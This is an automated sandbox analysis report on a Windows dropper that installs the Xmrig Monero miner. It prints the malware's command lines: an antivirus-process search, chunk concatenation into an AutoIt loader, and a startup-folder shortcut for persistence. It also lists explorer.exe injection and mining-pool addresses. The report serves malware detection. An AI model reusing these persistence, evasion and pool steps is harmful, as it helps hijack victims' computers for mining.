Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561926
MD5:978752b65601018ddd10636b648b8e65
SHA1:2c0e320cb0d84c6760a925d873d58e701e3e6cb1
SHA256:8bf64a9906e8177eab206dac3a550bc5918213659f98eac6295b8e24184eb782
Tags:CoinMinerexeuser-Bitsight
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
DNS related to crypt mining pools
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Conhost Spawned By Uncommon Parent Process
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6432 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 978752B65601018DDD10636B648B8E65)
    • cmd.exe (PID: 3060 cmdline: "C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 1788 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3640 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 4828 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6488 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2228 cmdline: cmd /c md 29442 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 5452 cmdline: cmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Reynolds.com (PID: 5772 cmdline: Reynolds.com l MD5: C63860691927D62432750013B5A20F5F)
        • cmd.exe (PID: 5160 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & echo URL="C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Reynolds.com (PID: 3640 cmdline: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com MD5: C63860691927D62432750013B5A20F5F)
          • explorer.exe (PID: 6504 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
            • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 4464 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 1776 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • ZeusChat.scr (PID: 6692 cmdline: "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr" "C:\Users\user\AppData\Local\CyberSphere Dynamics\M" MD5: C63860691927D62432750013B5A20F5F)
      • ZeusChat.scr (PID: 4444 cmdline: "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr" MD5: C63860691927D62432750013B5A20F5F)
      • ZeusChat.scr (PID: 4148 cmdline: "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr" MD5: C63860691927D62432750013B5A20F5F)
        • explorer.exe (PID: 3524 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
          • conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000002.2486993892.0000000000FE1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    00000017.00000002.2487104363.0000000140001000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000012.00000002.3264299114.00000000012F8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        Process Memory Space: explorer.exe PID: 6504JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          Process Memory Space: explorer.exe PID: 3524JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            23.2.explorer.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              23.2.explorer.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
              • 0x432ee0:$x1: donate.ssl.xmrig.com
              23.2.explorer.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
              • 0x433888:$s1: %s/%s (Windows NT %lu.%lu
              • 0x437380:$s3: \\.\WinRing0_
              • 0x3e4928:$s4: pool_wallet
              • 0x3e0698:$s5: cryptonight
              • 0x3e06a8:$s5: cryptonight
              • 0x3e06b8:$s5: cryptonight
              • 0x3e06c8:$s5: cryptonight
              • 0x3e06e0:$s5: cryptonight
              • 0x3e06f0:$s5: cryptonight
              • 0x3e0700:$s5: cryptonight
              • 0x3e0718:$s5: cryptonight
              • 0x3e0728:$s5: cryptonight
              • 0x3e0740:$s5: cryptonight
              • 0x3e0758:$s5: cryptonight
              • 0x3e0768:$s5: cryptonight
              • 0x3e0778:$s5: cryptonight
              • 0x3e0788:$s5: cryptonight
              • 0x3e07a0:$s5: cryptonight
              • 0x3e07b8:$s5: cryptonight
              • 0x3e07c8:$s5: cryptonight
              • 0x3e07d8:$s5: cryptonight

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" , ProcessId: 1776, ProcessName: wscript.exe
              Sigma detected: Conhost Spawned By Uncommon Parent Process
              Source: Process startedAuthor: Tim Rauch: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: explorer.exe, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6504, ParentProcessName: explorer.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 5768, ProcessName: conhost.exe
              Sigma detected: SCR File Write Event
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com, ProcessId: 5772, TargetFilename: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr
              Sigma detected: Suspicious Copy From or To System Directory
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6432, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd, ProcessId: 3060, ProcessName: cmd.exe
              Sigma detected: Suspicious Screensaver Binary File Creation
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com, ProcessId: 5772, TargetFilename: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" , ProcessId: 1776, ProcessName: wscript.exe

              Data Obfuscation

              barindex
              Sigma detected: Drops script at startup location
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\cmd.exe, ProcessId: 5160, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Sigma detected: Search for Antivirus process
              Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3060, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 6488, ProcessName: findstr.exe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.4% probability

              Bitcoin Miner

              barindex
              Yara detected Xmrig cryptocurrency miner
              Source: Yara matchFile source: 23.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000017.00000002.2486993892.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.2487104363.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.3264299114.00000000012F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6504, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3524, type: MEMORYSTR
              DNS related to crypt mining pools
              Source: unknownDNS query: name: xmr-eu2.nanopool.org
              Found strings related to Crypto-Mining
              Source: explorer.exe, 00000017.00000002.2487104363.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+ssl://randomx.xmrig.com:443
              Source: explorer.exeString found in binary or memory: cryptonight/0
              Source: explorer.exe, 00000017.00000002.2487104363.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: autorunsc64a.pdb source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: autorunsc64a.pdb= source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Autoruns.pdb source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Autoruns64a.pdb source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Autoruns64.pdb source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: autorunsc.pdb source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: utorunsc.pdb source: explorer.exe, 00000012.00000002.3264572586.000000000162E000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: explorer.exe, 00000012.00000003.2516037085.00000000054AC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3265796424.00000000054CB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2312256260.0000000001350000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354445600.00000000054AC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2703350861.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2672721393.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2550085788.00000000054CD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: utorunsc64.pdb source: explorer.exe, 00000012.00000002.3264572586.000000000162E000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: autorunsc64.pdb source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: utoruns64a.pdb source: explorer.exe, 00000012.00000002.3264572586.000000000162E000.00000004.00000010.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA132DE0 FindFirstFileExW,17_2_00007FF7AA132DE0
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA16CE3C GetFileAttributesW,FindFirstFileW,FindClose,17_2_00007FF7AA16CE3C
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF752042DE0 FindFirstFileExW,20_2_00007FF752042DE0
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75207CE3C GetFileAttributesW,FindFirstFileW,FindClose,20_2_00007FF75207CE3C
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\29442Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\29442\Jump to behavior

              Networking

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\explorer.exeNetwork Connect: 163.172.171.111 10343Jump to behavior
              Source: global trafficTCP traffic: 192.168.2.5:49735 -> 163.172.171.111:10343
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: DqnJUgbSFuO.DqnJUgbSFuO
              Source: global trafficDNS traffic detected: DNS query: xmr-eu2.nanopool.org
              Source: file.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
              Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: explorer.exe, 00000012.00000002.3265796424.0000000005480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
              Source: explorer.exe, 00000012.00000003.2611556085.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354530325.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354580125.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3264505846.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2703373555.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354530325.00000000013C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
              Source: file.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: file.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
              Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
              Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
              Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
              Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
              Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: file.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: file.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: explorer.exe, 00000012.00000003.2642127911.0000000001335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3264409592.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca
              Source: explorer.exe, 00000012.00000003.2611556085.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354530325.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354580125.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3264505846.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2703373555.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3265796424.0000000005480000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354530325.00000000013C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
              Source: file.exeString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exeString found in binary or memory: http://ocsp.digicert.com0A
              Source: file.exeString found in binary or memory: http://ocsp.entrust.net02
              Source: file.exeString found in binary or memory: http://ocsp.entrust.net03
              Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
              Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
              Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
              Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
              Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
              Source: Reynolds.com, ZeusChat.scrString found in binary or memory: http://www.autoitscript.com/autoit3/
              Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, Reynolds.com, 0000000A.00000000.2066097134.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp, ZeusChat.scr, 00000010.00000000.2205239967.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp, Reynolds.com, 00000011.00000000.2255000492.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2411864117.0000000015614000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr, 00000014.00000000.2409093623.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp, ZeusChat.scr, 00000015.00000000.2415165241.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
              Source: file.exeString found in binary or memory: http://www.digicert.com/CPS0
              Source: file.exeString found in binary or memory: http://www.entrust.net/rpa03
              Source: explorer.exe, 00000012.00000002.3264299114.00000000012F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/horsicq/DIE-engine
              Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
              Source: file.exeString found in binary or memory: https://www.entrust.net/rpa0
              Source: Tech.0.drString found in binary or memory: https://www.globalsign.com/repository/0
              Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.drString found in binary or memory: https://www.globalsign.com/repository/06
              Source: explorer.exe, 00000012.00000002.3264299114.00000000012F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.virustotal.com/en/search/?query=
